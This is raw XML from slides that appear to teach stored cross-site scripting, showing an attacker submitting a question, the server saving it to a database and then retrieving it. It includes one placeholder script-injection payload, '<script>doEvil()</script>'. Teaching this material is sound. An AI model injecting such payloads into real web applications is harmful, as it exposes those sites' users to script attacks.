                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>questions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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2" name="object 12"/>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3" name="object 13"/>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4" name="object 14"/>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5" name="object 15"/>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6" name="object 16"/>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7" name="object 17"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8792013" y="3988906"/>
            <a:ext cx="3428153" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-457189">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>asks malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7"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19" name="object 19"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“&lt;script&gt;doEvil()&lt;/script&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2834199"/>
            <a:ext cx="2479040" cy="1144692"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="1859280" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>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4" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>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6" name="object 26"/>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27" name="object 27"/>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28" name="object 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>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1" name="object 31"/>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2" name="object 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 34"/>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35" name="object 35"/>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6" name="object 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 38"/>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9" name="object 39"/>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0" name="object 40"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273726" y="3603749"/>
            <a:ext cx="1134533"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2" name="object 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="object 45"/>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46" name="object 46"/>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7" name="object 47"/>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48" name="object 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367764" y="3050012"/>
            <a:ext cx="291253" cy="209973"/>
            <a:chOff x="275823" y="2287509"/>
            <a:chExt cx="218440" cy="157480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 49"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 50"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63555" y="3662876"/>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52" name="object 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740987" y="5752199"/>
            <a:ext cx="1949027" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="539313"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>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54" name="object 54"/>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196564"/>
            <a:ext cx="3307080" cy="3420533"/>
            <a:chOff x="6209088" y="897423"/>
            <a:chExt cx="2480310" cy="256540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952808" y="897423"/>
              <a:ext cx="736061" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>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93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2298960" y="3503061"/>
            <a:ext cx="5149427" cy="1507067"/>
            <a:chOff x="1724220" y="2627296"/>
            <a:chExt cx="3862070" cy="1130300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>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9" name="object 9"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342323" y="3363927"/>
            <a:ext cx="2352885" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="just">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>retrieves </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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2" name="object 12"/>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3" name="object 13"/>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4" name="object 14"/>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5" name="object 15"/>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6" name="object 16"/>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7" name="object 17"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8792013" y="3988905"/>
            <a:ext cx="3340100" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>asks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249213" y="4354665"/>
            <a:ext cx="2970953" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7"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20" name="object 20"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
